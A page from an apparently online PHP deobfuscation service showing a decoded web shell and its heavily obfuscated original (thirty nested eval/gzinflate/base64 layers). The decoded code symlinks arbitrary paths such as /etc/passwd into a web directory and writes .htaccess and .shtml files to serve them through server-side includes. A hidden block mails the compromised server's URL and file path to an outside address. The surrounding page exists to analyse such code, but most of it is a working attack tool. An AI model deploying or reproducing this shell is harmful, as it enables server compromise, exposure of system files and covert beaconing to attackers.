Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /* online encode by cha88.cn! */ eval(gzinflate(base64_decode('FZdFEsTYEUT3cx..
Decoded Output download
?><html>
<head>
<title>
# LiteSpeed - Apache - Nginx
</title>
</head>
<body></font><form method="POST">
<pre>
______ __ __ ___ ___ __ ________ _______ ___ ______
/_____/\/__/\ /__/\ /__/\ /__/\ /_/\ /_______/\ /_______/\ /__/\ /_____/\
\:::__\/\ \::\:.\ \::\ \ \ \ _______\:\ \ \::: _ \ \::: _ \ \::\ \:::__\/
/: / \_\::_\:_\/ \::\/_\ .\ \ /______/\:\ \ \::(_) \ \::(_) \/_\:_\/ /: /
/::/___ _\/__\_\_/\:: ___::\ \__::::\/ \:\ \____\:: __ \ \:: _ \ \ /::/___
/_:/____/\ \ \ \::\ \: \ \::\ \ \:\/___/\:.\ \ \ \::(_) \ \ /_:/____/\
\_______\/ \_\/ \__\/ \__\/ \::\/ \_____\/ \__\/\__\/ \_______\/ \_______\/
</pre><p><font face="Verdana" size="2" color="#FF0000">Nobody Likes Us :) </font></p><br><br>
<div align="left">
<table border="0" cellspacing="0" cellpadding="0" width="797">
<tr>
<td>
<font face="Verdana" color="#FF0000">
<p align="left"><font face="Tahoma"><font color="#FF0000">Full PATH</font> :
<font size="3"> <b><input value="/etc/passwd" name="path" style="font-family: Tahoma; color: #FF0000; border: 1px dotted #FF0000" size="44" tabindex="15"> </b></font></font></p>
</font>
<font face="Tahoma" color="#FF0000">
<p align="left">File Name</font><font face="Verdana" color="#FF0000"><font face="Tahoma"> :
<font size="3"> <b><input value="b0x.txt" name="filename" style="font-family: Tahoma; color: #FF0000; border: 1px dotted #FF0000" size="44" tabindex="15"> </b></font></font></p>
<p align="left"><font size="3" face="Tahoma"><b>
</b></font>
<b><font size="3" face="Tahoma">
<input type="submit" value="Execute" style="font-family: Tahoma; color: #FF0000; border: 1px dotted #FF0000" name="z00z"></font></b></p>
<b><font size="3" face="Tahoma">
</form>
<?php
# Security4Ever | sec4ever.com | n1x.cc
# Greet'z 2 n1x | Sec4ever | The Injector | I-Hmx | h311coD3 | X-Shadow | Th3MMA | Jago-Dz | BlackHunter | Mr.L4iv3 | RayMon | Ma3stRo_DZ | Lagripe-DZ | RxR | OsSi | HeliA | Dr AnGeL | FoX HaCkER | R3d-DevIL | x3
# Special Greet'z 2 FreeMAN[LY] | T0R0B0XHACKER |
# All Rights Reserved To The Injector
$path = $_POST['path'];
$file = $_POST['filename'];
if($_POST['z00z']){
echo'
<br><br><span style="background-color: #FFFFFF">Status b0x</span></font></b><font face="Verdana"><span style="background-color: #FFFFFF"><br>
</span></font>
<textarea rows="12" cols="96" name="Status b0x" style="font-family: Tahoma; color: #FF0000; border: 1px dotted #FF0000">';
Error_reporting(0);
$direcotry = "b0x";
$comp="IyBDcmVhdGVkIEJ5IFR1cmtpc0gtUnVsZVoNCiMgR2VuZXJhdGVkIEJ5IFRSLUxTMg0KT3B0aW9ucyArSW5jbHVkZXMNCkFkZFR5cGUgdGV4dC9odG1sIC5zaHRtbA0KQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5zaHRtbA0K";
$mkdir = @mkdir($direcotry);
if($mkdir){
echo "[+] Creating Directory ... Done
";
}else{
echo"[+] I Can't Make New Folder , But I'll Continue If It Exist's !
";
}
@symlink("$path","b0x/$file");
$open = fopen("b0x/.htaccess","w");
$handle = fwrite($open,base64_decode($comp));
@fclose($open);
if($open){
echo"[+] Opening Apache Access File ... Done
";
}else{
echo"[+] Access is Denied , Try Again With User Privilege :)
";
exit;
}
if($handle){
echo"[+] Writing Access RuleZ ... Done
";
}
$r1z="PCEtLSNpbmNsdWRlIHZpcnR1YWw9Ig==";
$r1zcom = "IiAtLT4=";
$open2 = fopen("b0x/b0x.shtml","w");
$handle2 = fwrite($open2,base64_decode($r1z).$file.base64_decode($r1zcom));
@fclose($open2);
if($open2){
echo"[+] Opening Server HTML Web Page ... Done
";
}else{
echo"[+] Access is Denied , Try Again With User Privilege :)
";
exit;
}
if($handle2){
echo"[+] Writing SHTML RuleZ ... Done
";
echo"[+] All Task'z Have Done !";
}
echo'
</textarea></td>
</tr>
</table>
</div>
<p> </p>
';
}
?>
<?
// sh3ll.us & no-shell.net
// [email protected]
// [email protected]
$site = "www.Sh3ll.Us";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
$to = "[email protected]";
$subject = "EGFM";
$header = "from: EGFM <[email protected]>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "
";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
echo "";
exit;
}
?>
</body></html><?php chdir($lastdir); c99shexit(); ?><?
Did this file decode correctly?
Original Code
<?php
/*
online encode by cha88.cn!
*/
eval(gzinflate(base64_decode('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')));
?>
Function Calls
gzinflate | 30 |
base64_decode | 30 |
Stats
MD5 | 93d3438630eb6f69c4451e9ac2bb0a95 |
Eval Count | 30 |
Decode Time | 205 ms |